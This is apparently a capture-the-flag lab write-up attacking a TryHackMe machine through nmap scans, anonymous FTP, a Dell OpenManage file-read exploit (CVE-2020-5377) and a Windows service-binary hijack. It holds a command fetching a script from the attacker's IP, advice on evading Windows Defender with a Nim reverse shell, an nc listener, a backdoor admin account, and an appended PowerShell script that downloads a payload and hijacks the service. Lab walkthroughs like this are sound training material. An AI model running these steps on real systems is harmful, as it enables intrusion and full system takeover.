┌──(kali㉿kali)-[~]
└─$ nmap -p- hacksmarter.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 01:56 EDT
Nmap scan report for hacksmarter.thm (10.10.72.186)
Host is up (0.18s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
1311/tcp open rxmon
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 323.05 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 21,22,80,1311,3389 -T4 hacksmarter.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 02:04 EDT
Nmap scan report for hacksmarter.thm (10.10.72.186)
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HackSmarterSec
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open ssl/rxmon?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Wed, 27 Mar 2024 06:04:23 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
| <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| HTTPOptions:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Wed, 27 Mar 2024 06:04:29 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
|_ <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Not valid before: 2023-06-30T19:03:17
|_Not valid after: 2025-06-29T19:03:17
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-27T06:04:55+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-27T06:04:50+00:00
| ssl-cert: Subject: commonName=hacksmartersec
| Not valid before: 2024-03-26T04:59:47
|_Not valid after: 2024-09-25T04:59:47
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1311-TCP:V=7.94SVN%T=SSL%I=7%D=3/27%Time=6603B6E8%P=x86_64-pc-linux
...
SF:"></script><script\x20language=\"javascript\">\r\n\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.52 seconds
We can see anonymous login via FTP is possible. Let's do that.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.72.186
Connected to 10.10.72.186.
220 Microsoft FTP Service
Name (10.10.72.186:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49735|)
150 Opening ASCII mode data connection.
06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
06-28-23 03:00PM 1022126 stolen-passport.png
226 Transfer complete.
ftp> wget Credit-Cards-We-Pwned.txt
?Invalid command.
ftp> get Credit-Cards-We-Pwned.txt
local: Credit-Cards-We-Pwned.txt remote: Credit-Cards-We-Pwned.txt
229 Entering Extended Passive Mode (|||49737|)
125 Data connection already open; Transfer starting.
100% |********************************| 3722 25.81 KiB/s 00:00 ETA
226 Transfer complete.
3722 bytes received in 00:00 (23.95 KiB/s)
ftp> binary
200 Type set to I.
ftp> get stolen-passport.png
local: stolen-passport.png remote: stolen-passport.png
229 Entering Extended Passive Mode (|||49751|)
125 Data connection already open; Transfer starting.
100% |*********************************| 998 KiB 179.06 KiB/s 00:00 ETA
226 Transfer complete.
1022126 bytes received in 00:05 (170.36 KiB/s)
ftp> exit
To download the PNG intact we have to switch to binary mode first; the default ASCII mode rewrites line endings and would corrupt a binary file.
Credit-Cards-We-Pwned.txt contains a list of credit card details.
On the IIS site on port 80, Gobuster revealed a directory called images, but we can't access it.
We continue with the web service on port 1311. Unfortunately, the Gobuster scan on this endpoint did not reveal anything. When visiting the page over plain HTTP we get the hint that TLS is required.
We switch to https://hacksmartersec:1311/ and get redirected to https://hacksmartersec:1311/OMSALogin?msgStatus=null. We are dealing with Dell EMC OpenManage and are presented with a login page, but let's take a look around first.
The About page reveals more details, including the running version: 9.4.0.2.
Initial Access
As already mentioned, we are dealing with Dell EMC OpenManage Server Administrator (OMSA) version 9.4.0.2. CVE-2020-5377 is known to affect this version and is explained in detail in the following articles.
The blog discusses vulnerabilities found in OMSA during an internal penetration test, CVE-2020-5377 and CVE-2021-21514. It details an authentication bypass and an arbitrary file read vulnerability in OMSA versions 9.4.0.0 and 9.4.0.2. The authentication bypass was deemed intended functionality.
The file read vulnerability allows arbitrary file access. A security filter meant to address it was bypassed, which is what CVE-2021-21514 covers. A proof of concept for exploiting these vulnerabilities was provided.
The blog concludes with recommendations to secure OMSA usage. PoCs can also be found via Searchsploit / exploit-db.com. However, those do not work in this case, because the exploit-db version of the PoC does not include the security filter bypass of CVE-2021-21514 that is needed against 9.4.0.2.
The article links to the company's own PoC, which is also referenced at exploit-db. We will use this to read files from the system:
We have arbitrary file read. The PoC takes our own IP first (the authentication bypass has the target connect back to a fake OMSA node that the script hosts for us) and then the target host:port.
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ python3 CVE-2020-5377.py 10.17.15.155 10.10.72.186:1311
Session: B5B7564089D15D80F946B47850C18DA4
VID: CD41F7522B9B6D42
file > /windows/system32/drivers/etc/hosts
Reading contents of /windows/system32/drivers/etc/hosts:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
file >
Reading further files on the system eventually yields a username and password.
We can SSH in with those credentials.
This gives us the first flag.
Privilege Escalation
The system is protected by Windows Defender: WinPEAS was detected and removed from disk as soon as it landed. PrivescCheck, a PowerShell script that performs similar checks, was not flagged.
curl http://10.17.15.155/Pcheck.ps1 -o p.ps1
. .\p.ps1; Invoke-PrivescCheck -Extended
We find a finding rated as high: the spoofer-scheduler service can be started and stopped by a normal user, and the service runs as LocalSystem. If we can also replace the service executable, e.g. with a reverse shell or with an executable that creates an admin account for us, we can escalate our privileges.
We confirm that we can write to C:\Program Files (x86)\Spoofer. Now we need a reverse shell executable that Windows Defender does not detect; a plain msfvenom payload is flagged and deleted immediately. A reverse shell written in Nim does the job.
To install Nim and mingw-w64 run the following:
sudo apt install mingw-w64
sudo apt install nim
After setting our host and port in the source, we cross-compile it for Windows. -d:mingw selects the mingw-w64 toolchain and --app:gui keeps the binary from opening a console window when the service starts it:
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe rev_shell.nim
Once compiled, we serve the file with a Python HTTP server and download it to the target. We first back up the original spoofer-scheduler.exe, just to be safe.
Next, we stop the service, replace spoofer-scheduler.exe with ours and start the service again.
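As an added example (this is not code from the original writeup or from PrivescCheck), the following PowerShell block generalizes the finding above: it lists every service whose binary or install folder the current user can write to, which is the condition PrivescCheck reported for spoofer-scheduler, and then performs the hijack steps just described. The service name, install path and the attacker IP 10.17.15.155 are taken from the writeup; the HTTP port 8000 and the payload filename are assumptions.

```powershell
# Added example: enumerate hijackable service binaries, then hijack one.
# Assumptions: service 'spoofer-scheduler' installed under
# C:\Program Files (x86)\Spoofer, attacker at 10.17.15.155 serving the
# payload on port 8000 (python3 -m http.server 8000).

function Get-WritableServiceBinaries {
    # SIDs the current token carries: the user plus every group, so ACEs
    # granted to BUILTIN\Users or Authenticated Users are counted as well.
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User) + @($id.Groups)
    # Enough to overwrite the file or to delete and recreate it. Generic
    # rights on inherit-only ACEs are not decoded here.
    $writeMask = [System.Security.AccessControl.FileSystemRights]'Write, Delete'

    function Test-WritableBySids([string]$path) {
        try { $acl = Get-Acl -LiteralPath $path -ErrorAction Stop } catch { return $false }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
            catch { continue }   # orphaned or untranslatable principal
            if (($sids -contains $sid) -and (($ace.FileSystemRights -band $writeMask) -ne 0)) {
                return $true
            }
        }
        return $false
    }

    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        # PathName may be quoted and may carry arguments; keep only the executable.
        $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
               else { ($svc.PathName -split ' ')[0] }
        if (-not (Test-Path -LiteralPath $exe)) { continue }

        $fileWritable = Test-WritableBySids $exe
        $dirWritable  = Test-WritableBySids (Split-Path -LiteralPath $exe -Parent)
        if ($fileWritable -or $dirWritable) {
            [pscustomobject]@{
                Name         = $svc.Name
                RunsAs       = $svc.StartName   # LocalSystem is the interesting case
                State        = $svc.State
                Path         = $exe
                FileWritable = $fileWritable
                DirWritable  = $dirWritable
            }
        }
    }
}

# --- Hijack, as done in the writeup (names and ports are assumptions) ---
$svcName = 'spoofer-scheduler'
$exe     = 'C:\Program Files (x86)\Spoofer\spoofer-scheduler.exe'
$payload = 'http://10.17.15.155:8000/spoofer-scheduler.exe'   # our Nim reverse shell

Get-WritableServiceBinaries | Where-Object Name -eq $svcName | Format-List
# In the service SDDL, RP (start) and WP (stop) granted to AU, BU or IU
# mean any user may restart the service.
sc.exe sdshow $svcName

Stop-Service -Name $svcName -ErrorAction Stop
Copy-Item -LiteralPath $exe -Destination "$exe.bak" -Force       # keep the original for cleanup
Invoke-WebRequest -Uri $payload -OutFile $exe -UseBasicParsing
# The SCM launches our binary as LocalSystem. Because it never reports back
# as a started service, Start-Service fails with error 1053 after ~30 s and
# the SCM kills the process; the listener on 10.17.15.155 still catches the
# shell in the meantime.
Start-Service -Name $svcName -ErrorAction SilentlyContinue

# Cleanup once persistence is in place:
# Stop-Service $svcName; Move-Item -LiteralPath "$exe.bak" -Destination $exe -Force; Start-Service $svcName
```

Run the enumeration part on its own first; if a service runs as LocalSystem and shows FileWritable or DirWritable as True, that is the same class of weakness PrivescCheck flagged here, and the hijack section applies with the matching name and path.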
The shell we get is very unstable and frequently times out: our binary is not a real service and never reports back to the Service Control Manager, which gives up after about 30 seconds (error 1053) and kills the process. We can either set up persistence quickly or be fast and grab what we need.
Our reverse shell connects, we are NT AUTHORITY\SYSTEM and have access to C:\Users\Administrator. As the challenge says, the next targets of the threat actor are on the Administrator's desktop:
Once you gain access to their server, navigate through their intricate network infrastructure, bypassing firewalls, encryption protocols, and other security layers. Locate the central repository where they store sensitive information, including their upcoming target list. Intel has reported this is located on the desktop of the Administrator user.
Let's set up persistence so we can log back in easily even if we lose our reverse shell:
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.72.186] 50110
C:\Windows\system32> net user bun Hacksmarter123 /add
The command completed successfully.
C:\Windows\system32> net localgroup administrators bun /add
The command completed successfully.
We can now SSH in with the above credentials and find the target list for the last task of the challenge.